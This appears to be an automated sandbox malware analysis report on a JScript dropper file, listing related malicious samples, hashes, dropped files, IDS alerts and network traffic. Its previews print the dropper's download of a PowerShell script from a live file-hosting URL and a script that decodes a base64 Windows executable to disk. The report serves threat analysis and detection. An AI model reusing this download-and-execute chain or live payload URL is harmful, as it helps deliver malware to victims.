                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ip-api.comDHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 208.95.112.1
                                                                  dlhost.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                  • 208.95.112.1
                                                                  xt.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                  • 208.95.112.1
                                                                  roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                  • 208.95.112.1
                                                                  random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                  • 208.95.112.1
                                                                  x.ps1Get hashmaliciousQuasarBrowse
                                                                  • 208.95.112.1
                                                                  https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                                                  • 208.95.112.2
                                                                  Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                  • 208.95.112.1
                                                                  files.catbox.moeTT copy.jsGet hashmaliciousFormBookBrowse
                                                                  • 108.181.20.35
                                                                  z68scancopy.vbsGet hashmaliciousFormBookBrowse
                                                                  • 108.181.20.35
                                                                  2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                                  • 108.181.20.35
                                                                  QwLii5vouB.exeGet hashmaliciousUnknownBrowse
                                                                  • 108.181.20.35
                                                                  PO Huaruicarbon 98718.htmlGet hashmaliciousCorporateDataTheft, HTMLPhisherBrowse
                                                                  • 108.181.20.35
                                                                  5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                                  • 108.181.20.35
                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                  • 108.181.20.35
                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                  • 108.181.20.35
                                                                  https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9Get hashmaliciousUnknownBrowse
                                                                  • 108.181.20.35
                                                                  LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                  • 108.181.20.35
                                                                  ftp.jeepcommerce.rsfactura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 195.252.110.253
                                                                  2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  Eemw0Iqp2J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  b83NG35487.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  INV & BANK DETAILS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  PO#150003191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ASN852CAnshkarm.elfGet hashmaliciousMiraiBrowse
                                                                  • 172.218.17.247
                                                                  nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 161.187.17.134
                                                                  la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 206.87.250.195
                                                                  spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 206.116.174.112
                                                                  arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 198.166.177.224
                                                                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 207.6.113.169
                                                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 199.175.201.159
                                                                  StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                  • 108.181.61.49
                                                                  1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                  • 108.181.61.49
                                                                  BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                                                                  • 108.181.61.49
                                                                  TUT-ASUSfile.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                  • 208.95.112.1
                                                                  DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 208.95.112.1
                                                                  dlhost.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                  • 208.95.112.1
                                                                  xt.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                  • 208.95.112.1
                                                                  roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                  • 208.95.112.1
                                                                  random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                  • 208.95.112.1
                                                                  x.ps1Get hashmaliciousQuasarBrowse
                                                                  • 208.95.112.1
                                                                  https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                                                  • 208.95.112.2
                                                                  BEOTEL-AShttpwwwbeotelnetRSfactura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  bot.x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 62.108.98.135
                                                                  bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 62.108.98.187
                                                                  jade.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 62.108.98.145
                                                                  R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 195.252.110.253
                                                                  2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  Eemw0Iqp2J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  b83NG35487.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253
                                                                  arm.nn-20241201-1515.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 62.193.140.91
                                                                  [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 195.252.110.253

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  37f463bf4616ecd445d4a1937da06e19Fortexternal.exeGet hashmaliciousUnknownBrowse
                                                                  • 108.181.20.35
                                                                  676556be12ac3.vbsGet hashmaliciousMint StealerBrowse
                                                                  • 108.181.20.35
                                                                  PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.htaGet hashmaliciousMint StealerBrowse
                                                                  • 108.181.20.35
                                                                  ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                  • 108.181.20.35
                                                                  pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                  • 108.181.20.35
                                                                  FinTP-Update.exeGet hashmaliciousCobaltStrikeBrowse
                                                                  • 108.181.20.35
                                                                  hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                  • 108.181.20.35
                                                                  hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                  • 108.181.20.35
                                                                  billys.exeGet hashmaliciousMeduza StealerBrowse
                                                                  • 108.181.20.35

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Temp\dddddd.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\wscript.exe
                                                                  File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1291000
                                                                  Entropy (8bit):5.7192971633601335
                                                                  Encrypted:false
                                                                  SSDEEP:24576:L3Ady3x3chk7TKYi+gHrG4ceFOjenP09dUkJmInb2:oy0k7TbmrKWYUkP2
                                                                  MD5:FFB44667070A4A921897A26BBFC17B77
                                                                  SHA1:8CDE3094E0794A6F7A50B927A390F559DF5888F5
                                                                  SHA-256:8CDB70F9F1F38B8853DFAD62D84618BB4F10ACCE41E9F0FDDAB422C2C253C994
                                                                  SHA-512:E3F8CCD2F39DB18D949F14A7255431E4006B9E2C0903F843CBE6740D65B5438A8C6A4CAABC0D7BEA563F25E4BF9E7599D67C3A2D57FC5A982715BC7725CB825B
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADCHpS/hn/67IZ/+uyGf/rsFTFi7IR/+uyd4lDsKX/67J3iUeyzf/rsjwd57I9/+uyPB2nsp3/67IZ/++yWffrsneJO7M5/+uyd4mTsmn/67J3iYOyHf/rshn9t7Id/+uyd4mfsh3/67FJpY2iGf/rsAAAAAAAAAABQRQAATAEEAOy6JU8AAAAAAAAAAOAAIwELAQoAAAgIAADcAQAAAAAAwWUBAAAQAAAAIAgAAABAAAAQAAAAAgAABQAAAAAAAAAFAAAAAAAAAABQCwAABAAAH5YKAAIAAIAAAEAAABAAAAAAQAAAEAAAAAAAABAAAAAAAAAAAAAAABzUCABUAQAAALAKACiTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAgARAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAHAYIAAAQAAAACAgAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAMDfAAAAIAgAAOAAAAAMCAAAAAAAAAAAAAAAAABAAABALmRhdGEAAABYpwEAAAAJAABoAAAA7AgAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAAKJMAAACwCgAAlAAAAFQJAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\gj7umd[1].ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\wscript.exe
                                                                  File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1291000
                                                                  Entropy (8bit):5.7192971633601335
                                                                  Encrypted:false
                                                                  SSDEEP:24576:L3Ady3x3chk7TKYi+gHrG4ceFOjenP09dUkJmInb2:oy0k7TbmrKWYUkP2
                                                                  MD5:FFB44667070A4A921897A26BBFC17B77
                                                                  SHA1:8CDE3094E0794A6F7A50B927A390F559DF5888F5
                                                                  SHA-256:8CDB70F9F1F38B8853DFAD62D84618BB4F10ACCE41E9F0FDDAB422C2C253C994
                                                                  SHA-512:E3F8CCD2F39DB18D949F14A7255431E4006B9E2C0903F843CBE6740D65B5438A8C6A4CAABC0D7BEA563F25E4BF9E7599D67C3A2D57FC5A982715BC7725CB825B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADCHpS/hn/67IZ/+uyGf/rsFTFi7IR/+uyd4lDsKX/67J3iUeyzf/rsjwd57I9/+uyPB2nsp3/67IZ/++yWffrsneJO7M5/+uyd4mTsmn/67J3iYOyHf/rshn9t7Id/+uyd4mfsh3/67FJpY2iGf/rsAAAAAAAAAABQRQAATAEEAOy6JU8AAAAAAAAAAOAAIwELAQoAAAgIAADcAQAAAAAAwWUBAAAQAAAAIAgAAABAAAAQAAAAAgAABQAAAAAAAAAFAAAAAAAAAABQCwAABAAAH5YKAAIAAIAAAEAAABAAAAAAQAAAEAAAAAAAABAAAAAAAAAAAAAAABzUCABUAQAAALAKACiTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAgARAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAHAYIAAAQAAAACAgAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAMDfAAAAIAgAAOAAAAAMCAAAAAAAAAAAAAAAAABAAABALmRhdGEAAABYpwEAAAAJAABoAAAA7AgAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAAKJMAAACwCgAAlAAAAFQJAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1628158735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllulvh2th:NllUE
                                                                  MD5:1C6FEFD3AEFA5BA7595E7FC2E4284A86
                                                                  SHA1:1061961FD8D9427258B32E58594747A9009930B7
                                                                  SHA-256:AB4853F85060BF67D37B111333E3852386DF7BF6AA0499E6CEF96B10CE5A1621
                                                                  SHA-512:03A091C2C65B6C22EFB336B4155E8579A540C773DB34E8F8654BC3D7044C00434020096B41BF2959245CA8722CF3913B38A653DE361A5BF0FDF218A6F07B6626
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:@...e.................................~..............@..........

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4och4dx.kbp.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsq1j4pn.y1u.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\aut923E.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):269824
                                                                  Entropy (8bit):7.890699397729132
                                                                  Encrypted:false
                                                                  SSDEEP:6144:BowkoHIP37XuFJ0/QSeGE1JOk09+7NDt322o+SLvAxQcHcL:iwkoH67XunYQDGE1JOL9+Jk+SLvAScHy
                                                                  MD5:298D53F4432E90E9F369A83D12C3CF6D
                                                                  SHA1:01E72BDC62529E83569B5D970FF69E2217B260B1
                                                                  SHA-256:CAB4EDFA1324F7EF5FF203CF2C2B9FDB5BD0E68156164B95F86016A3CE2F2F8A
                                                                  SHA-512:BE2DC430D4DE6984113439D543676A3F2FF2A7D06C3A551DCD12A619259EE3A777B10D55CC8FD7C625A5B9E864D623E0A88BEF7750E15C61154A109297788C8C
                                                                  Malicious:false
                                                                  Preview:...Z:FOQAF1Z..DU.U2RMXUV.SM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF.ZZPJJ.[2.D.t.T....Q/<q54^=(1)u&4\<",u40s?A4./!q..bz7? 0kX?XiXUVUSM42).b}4.Ov+.:y4.L`n'+i$.3?.8d .8.+...$.+.q#&I'.-..3G.>.;t.!$}5.;.[1%t$.+SM4Z9FOQEF1ZZPDU.x.7MXUV..M4.8BO%.FaZZPDUEU2.M{T]TZM4.8FO.GF1ZZPk.EU2BMXU.TSM4.9F_QEF3ZZUDUEU2RM]UVUSM4Z9&KQEB1Z.kFUGU2.MXEVUCM4Z9VOQUF1ZZPDEEU2RMXUVUSM.O;F.QEF1:XP..DU2RMXUVUSM4Z9FOQEF1ZZPDUE..SMDUVUSM4Z9FOQEF1ZZPDUEU2RMXUV.^O4.9FOQEF1ZZPDU.T2.LXUVUSM4Z9FOQEF1ZZPDUEU2RMX{"0+94Z9^.PEF!ZZP.TEU6RMXUVUSM4Z9FOQeF1:t" 4142R.5UVU.L4ZWFOQ.G1ZZPDUEU2RMXU.US..>X2.QEF.jZPDuGU2DMXU\WSM4Z9FOQEF1ZZ.DU.{@!?;UVU..5Z9&MQE.0ZZpFUEU2RMXUVUSM4.9F.QEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVU

                                                                  C:\Users\user\AppData\Local\Temp\ectosphere

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):269824
                                                                  Entropy (8bit):7.890699397729132
                                                                  Encrypted:false
                                                                  SSDEEP:6144:BowkoHIP37XuFJ0/QSeGE1JOk09+7NDt322o+SLvAxQcHcL:iwkoH67XunYQDGE1JOL9+Jk+SLvAScHy
                                                                  MD5:298D53F4432E90E9F369A83D12C3CF6D
                                                                  SHA1:01E72BDC62529E83569B5D970FF69E2217B260B1
                                                                  SHA-256:CAB4EDFA1324F7EF5FF203CF2C2B9FDB5BD0E68156164B95F86016A3CE2F2F8A
                                                                  SHA-512:BE2DC430D4DE6984113439D543676A3F2FF2A7D06C3A551DCD12A619259EE3A777B10D55CC8FD7C625A5B9E864D623E0A88BEF7750E15C61154A109297788C8C
                                                                  Malicious:false
                                                                  Preview:...Z:FOQAF1Z..DU.U2RMXUV.SM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF.ZZPJJ.[2.D.t.T....Q/<q54^=(1)u&4\<",u40s?A4./!q..bz7? 0kX?XiXUVUSM42).b}4.Ov+.:y4.L`n'+i$.3?.8d .8.+...$.+.q#&I'.-..3G.>.;t.!$}5.;.[1%t$.+SM4Z9FOQEF1ZZPDU.x.7MXUV..M4.8BO%.FaZZPDUEU2.M{T]TZM4.8FO.GF1ZZPk.EU2BMXU.TSM4.9F_QEF3ZZUDUEU2RM]UVUSM4Z9&KQEB1Z.kFUGU2.MXEVUCM4Z9VOQUF1ZZPDEEU2RMXUVUSM.O;F.QEF1:XP..DU2RMXUVUSM4Z9FOQEF1ZZPDUE..SMDUVUSM4Z9FOQEF1ZZPDUEU2RMXUV.^O4.9FOQEF1ZZPDU.T2.LXUVUSM4Z9FOQEF1ZZPDUEU2RMX{"0+94Z9^.PEF!ZZP.TEU6RMXUVUSM4Z9FOQeF1:t" 4142R.5UVU.L4ZWFOQ.G1ZZPDUEU2RMXU.US..>X2.QEF.jZPDuGU2DMXU\WSM4Z9FOQEF1ZZ.DU.{@!?;UVU..5Z9&MQE.0ZZpFUEU2RMXUVUSM4.9F.QEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVU

                                                                  C:\Users\user\AppData\Local\Temp\x.exe

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):968158
                                                                  Entropy (8bit):7.216637597858664
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCAKr4GEn9TFyHEg+eGHX:7JZoQrbTFZY1iaCAU89TIHEg+eiX
                                                                  MD5:915A6F3675442C388110FB11DB36620A
                                                                  SHA1:45A8CB74384A6E91BD154F75B79FC6AF99ABB935
                                                                  SHA-256:C93E37E35C4C7F767A5BDAB8341D8C2351EDB769A41B0C9C229C592DBFE14FF2
                                                                  SHA-512:7E5ACBC50998BA6FF79EC9B401C192166B6385E0AF44839ADF93531226FE009ACCD1D9F02FA647D300042E2D39D92954795C73AE08AE367881F0B1FCBB77C545
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 35%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@..........................P................@.......@.........................T.......(............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...(............T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:ASCII text, with CRLF line terminators
                                                                  Entropy (8bit):5.077202543020254
                                                                  TrID:
                                                                  • Digital Micrograph Script (4001/1) 100.00%
                                                                  File name:doc00290320092.jse
                                                                  File size:1'966 bytes
                                                                  MD5:a46d0818a4f925c210408c2637ee7810
                                                                  SHA1:dcdee5e4e5f8caef5740d52fd4444a209c341b8f
                                                                  SHA256:7fefb7a81a4c7d4a51a9618d9ef69e951604fa3d7b70d9a2728c971591c1af25
                                                                  SHA512:a6e462acef2fddcaf59269c7630023c86cd2596db3954f8db69ea9cf1d82379012ee88427f7e370db32cb41e733e6f496384a89981d568bbf48e2b3b4874d55f
                                                                  SSDEEP:24:R3+iTcSEqCWYOkA+jFqkNg3UDPVHz3ywbJWl0Y6h8r1u1+oJbcCVB5RtvbXZdnNW:Rui8qYFvJ3ywbJWCVUu1/tcKVtv7zNFo
                                                                  TLSH:7541BD5A9C1BE3215967A70E422FC148DF91826B1A14D261BD9CCA45BF306BCCE74F8E
                                                                  File Content Preview:// Constants to avoid magic strings..var URL = "https://files.catbox.moe/gj7umd.ps1";..var DownloadPath = "C:\\Temp\\dddddd.ps1";..var TEMP_DIR = "C:\\Temp";..var SUCCESS_STATUS = 200;....// Secure PowerShell execution policy and command..var POWERSHELL_C

                                                                  File Icon

                                                                  Icon Hash:68d69b8bb6aa9a86

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-20T17:42:29.642551+01002827578ETPRO MALWARE Likely Dropper Doc GET to .moe TLD1192.168.2.849707108.181.20.35443TCP
                                                                  2024-12-20T17:42:29.915016+01002018856ET MALWARE Windows executable base64 encoded1108.181.20.35443192.168.2.849707TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 17:42:26.871881008 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:26.871922016 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:26.871994019 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:26.902463913 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:26.902501106 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:28.640970945 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:28.641046047 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:28.694696903 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:28.694725990 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:28.695149899 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:28.695219994 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:28.699157953 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:28.743340969 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.642604113 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.642640114 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.642663956 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.642668962 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.642695904 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.642704010 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.642780066 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.760617018 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.760656118 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.760690928 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.760715008 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.760730982 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.760829926 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.813117981 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.813168049 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.813210964 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.813232899 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.813260078 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.813278913 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.914961100 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.914992094 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.915141106 CET49707443192.168.2.8108.181.20.35
